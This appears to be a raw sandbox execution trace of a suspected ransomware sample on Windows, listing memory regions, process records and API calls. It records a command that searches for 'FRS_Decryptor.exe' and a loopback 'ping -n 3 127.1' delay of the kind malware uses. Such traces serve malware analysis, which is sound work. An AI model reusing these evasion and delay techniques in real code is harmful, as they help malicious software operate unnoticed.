"\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 8444 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 8445 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 8446 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8447 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8448 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 8449 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 8450 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 8451 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 8452 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8453 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 8454 start_va = 0x7ed50000 end_va = 0x7ee4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed50000" filename = "" Region: id = 8455 start_va = 0x7ee77000 end_va = 0x7ee79fff entry_point = 0x0 region_type = private name = "private_0x000000007ee77000" filename = "" Region: id = 8468 start_va = 0x7b0000 end_va = 0x7effff entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 8469 start_va = 0x2860000 end_va = 0x289ffff entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 8470 start_va = 0x28a0000 end_va = 0x28dffff entry_point = 0x0 region_type = private name = "private_0x00000000028a0000" filename = "" Region: id = 8471 start_va = 0x28e0000 end_va = 0x291ffff entry_point = 0x0 region_type = private name = "private_0x00000000028e0000" filename = "" Region: id = 8472 start_va = 0x73360000 end_va = 0x7340afff entry_point = 0x73360000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 8473 start_va = 0x73420000 end_va = 0x7342ffff entry_point = 0x73420000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 8474 start_va = 0x7ed4a000 end_va = 0x7ed4cfff entry_point = 0x0 region_type = private name = "private_0x000000007ed4a000" filename = "" Region: id = 8475 start_va = 0x7ed4d000 end_va = 0x7ed4ffff entry_point = 0x0 region_type = private name = "private_0x000000007ed4d000" filename = "" Thread: id = 450 os_tid = 0xad8 Thread: id = 452 os_tid = 0xb20 Thread: id = 453 os_tid = 0xae8 Thread: id = 454 os_tid = 0xa88 Process: id = "165" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0xf583000" os_pid = "0x954" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "163" os_parent_pid = "0x4c8" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8372 start_va = 0x40000 end_va = 0x5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000040000" filename = "" Region: id = 8373 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 8374 start_va = 0x70000 end_va = 0x7efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 8375 start_va = 0x80000 end_va = 0xbffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 8376 start_va = 0xc0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 8377 start_va = 0x100000 end_va = 0x103fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 8378 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 8379 start_va = 0x120000 end_va = 0x121fff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 8380 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 8381 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8382 start_va = 0x7f4f0000 end_va = 0x7f512fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f4f0000" filename = "" Region: id = 8383 start_va = 0x7f51b000 end_va = 0x7f51dfff entry_point = 0x0 region_type = private name = "private_0x000000007f51b000" filename = "" Region: id = 8384 start_va = 0x7f51e000 end_va = 0x7f51efff entry_point = 0x0 region_type = private name = "private_0x000000007f51e000" filename = "" Region: id = 8385 start_va = 0x7f51f000 end_va = 0x7f51ffff entry_point = 0x0 region_type = private name = "private_0x000000007f51f000" filename = "" Region: id = 8386 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8387 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8388 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8389 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 8394 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 8395 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8396 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8397 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8456 start_va = 0x40000 end_va = 0x4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8457 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 8458 start_va = 0x60000 end_va = 0x63fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 8459 start_va = 0x130000 end_va = 0x1adfff entry_point = 0x130000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8460 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 8461 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8462 start_va = 0x73410000 end_va = 0x7341efff entry_point = 0x73410000 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\SysWOW64\\fsutilext.dll" (normalized: "c:\\windows\\syswow64\\fsutilext.dll") Region: id = 8463 start_va = 0x73500000 end_va = 0x73520fff entry_point = 0x73500000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\SysWOW64\\ulib.dll" (normalized: "c:\\windows\\syswow64\\ulib.dll") Region: id = 8464 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8465 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8466 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8467 start_va = 0x7f3f0000 end_va = 0x7f4effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f3f0000" filename = "" Thread: id = 451 os_tid = 0xac8 Process: id = "166" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x117e4000" os_pid = "0xa98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8476 start_va = 0x520000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 8477 start_va = 0x540000 end_va = 0x541fff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 8478 start_va = 0x550000 end_va = 0x55efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 8479 start_va = 0x560000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 8480 start_va = 0x5a0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 8481 start_va = 0x5e0000 end_va = 0x5e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 8482 start_va = 0x5f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 8483 start_va = 0x600000 end_va = 0x601fff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 8484 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 8485 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8486 start_va = 0x7f0a0000 end_va = 0x7f0c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f0a0000" filename = "" Region: id = 8487 start_va = 0x7f0c3000 end_va = 0x7f0c3fff entry_point = 0x0 region_type = private name = "private_0x000000007f0c3000" filename = "" Region: id = 8488 start_va = 0x7f0cc000 end_va = 0x7f0cefff entry_point = 0x0 region_type = private name = "private_0x000000007f0cc000" filename = "" Region: id = 8489 start_va = 0x7f0cf000 end_va = 0x7f0cffff entry_point = 0x0 region_type = private name = "private_0x000000007f0cf000" filename = "" Region: id = 8490 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8491 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8492 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8493 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 8494 start_va = 0x760000 end_va = 0x76ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 8495 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8496 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8497 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8498 start_va = 0x520000 end_va = 0x52ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 8499 start_va = 0x530000 end_va = 0x533fff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 8500 start_va = 0x610000 end_va = 0x68dfff entry_point = 0x610000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8501 start_va = 0x7d0000 end_va = 0x8cffff entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 8502 start_va = 0xab0000 end_va = 0xabffff entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 8503 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 8504 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 8505 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8506 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8507 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8508 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8509 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 8510 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8511 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8512 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8513 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 8514 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8515 start_va = 0x7efa0000 end_va = 0x7f09ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efa0000" filename = "" Region: id = 8516 start_va = 0x690000 end_va = 0x6cffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 8517 start_va = 0x6d0000 end_va = 0x70ffff entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 8518 start_va = 0x7f0c9000 end_va = 0x7f0cbfff entry_point = 0x0 region_type = private name = "private_0x000000007f0c9000" filename = "" Region: id = 8519 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 8520 start_va = 0x540000 end_va = 0x542fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 8521 start_va = 0x710000 end_va = 0x710fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 8522 start_va = 0x720000 end_va = 0x722fff entry_point = 0x720000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 8523 start_va = 0x770000 end_va = 0x7affff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 8524 start_va = 0x8d0000 end_va = 0x90ffff entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 8525 start_va = 0x7f0c6000 end_va = 0x7f0c8fff entry_point = 0x0 region_type = private name = "private_0x000000007f0c6000" filename = "" Thread: id = 455 os_tid = 0x798 [0146.642] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0146.642] __set_app_type (_Type=0x1) [0146.642] __p__fmode () returned 0x76ea1768 [0146.642] __p__commode () returned 0x76ea176c [0146.642] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0146.643] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0146.643] SetThreadUILanguage (LangId=0x0) returned 0x409 [0146.645] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0146.645] _fileno (_File=0x76ea4c28) returned 1 [0146.645] _get_osfhandle (_FileHandle=1) returned 0x28 [0146.645] GetFileType (hFile=0x28) returned 0x2 [0146.645] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5dedf0 | out: lpMode=0x5dedf0) returned 0 [0146.645] GetLastError () returned 0x6 [0146.645] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ded54, nSize=0x50 | out: lpBuffer="䤐}") returned 0x0 [0146.645] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0146.648] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x5dee0c | out: phkResult=0x5dee0c*=0x88) returned 0x0 [0146.648] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x5dee00, lpData=0x5dee08, lpcbData=0x5dee04*=0x4 | out: lpType=0x5dee00*=0x0, lpData=0x5dee08*=0x0, lpcbData=0x5dee04*=0x4) returned 0x2 [0146.648] RegCloseKey (hKey=0x88) returned 0x0 [0146.648] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0x5dedd0*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x5dee0c | out: ppResult=0x5dee0c*=0x7dc340*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7d8a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0146.648] FreeAddrInfoW (pAddrInfo=0x7dc340*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7d8a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0146.648] IcmpCreateFile () returned 0x7d6a30 [0146.651] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x7dc3e0 [0146.651] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x7e5270 [0146.652] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x5def08, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0146.653] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0x5dee00, nSize=0x0, Arguments=0x5dedfc | out: lpBuffer="竈~]┗\x94䰨盪❋") returned 0x14 [0146.654] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0146.654] _fileno (_File=0x76ea4c28) returned 1 [0146.654] _get_osfhandle (_FileHandle=1) returned 0x28 [0146.654] GetFileType (hFile=0x28) returned 0x2 [0146.654] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5dedc4 | out: lpMode=0x5dedc4) returned 0 [0146.654] GetLastError () returned 0x6 [0146.654] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ded28, nSize=0x50 | out: lpBuffer="]❋") returned 0x0 [0146.654] _fileno (_File=0x76ea4c28) returned 1 [0146.654] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0146.654] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0146.654] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x7e7b00 [0146.654] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x7e7b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0146.654] _fileno (_File=0x76ea4c28) returned 1 [0146.654] _write (in: _FileHandle=1, _Buf=0x7e7b00*, _MaxCharCount=0x14 | out: _Buf=0x7e7b00*) returned 20 [0146.655] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0146.655] _fileno (_File=0x76ea4c28) returned 1 [0146.655] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0146.655] LocalFree (hMem=0x7e7b00) returned 0x0 [0146.655] LocalFree (hMem=0x7e7ac8) returned 0x0 [0146.655] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x5dee00, nSize=0x0, Arguments=0x5dedfc | out: lpBuffer="竈~]▪\x94䰨盪❚") returned 0x18 [0146.655] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0146.655] _fileno (_File=0x76ea4c28) returned 1 [0146.655] _get_osfhandle (_FileHandle=1) returned 0x28 [0146.655] GetFileType (hFile=0x28) returned 0x2 [0146.655] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5dedc4 | out: lpMode=0x5dedc4) returned 0 [0146.655] GetLastError () returned 0x6 [0146.655] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ded28, nSize=0x50 | out: lpBuffer="]❚") returned 0x0 [0146.655] _fileno (_File=0x76ea4c28) returned 1 [0146.655] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0146.655] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0146.655] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x7dc138 [0146.655] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x7dc138, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0146.655] _fileno (_File=0x76ea4c28) returned 1 [0146.655] _write (in: _FileHandle=1, _Buf=0x7dc138*, _MaxCharCount=0x18 | out: _Buf=0x7dc138*) returned 24 [0146.655] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0146.655] _fileno (_File=0x76ea4c28) returned 1 [0146.655] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0146.655] LocalFree (hMem=0x7dc138) returned 0x0 [0146.655] LocalFree (hMem=0x7e7ac8) returned 0x0 [0146.655] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0146.655] IcmpSendEcho2Ex (in: IcmpHandle=0x7d6a30, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x7dc3e0, RequestSize=0x20, RequestOptions=0x5dee7c, ReplyBuffer=0x7e5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x7e5270) returned 0x1 [0146.656] InetNtopW (in: Family=2, pAddr=0x5dee6c, pStringBuf=0x5def94, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" 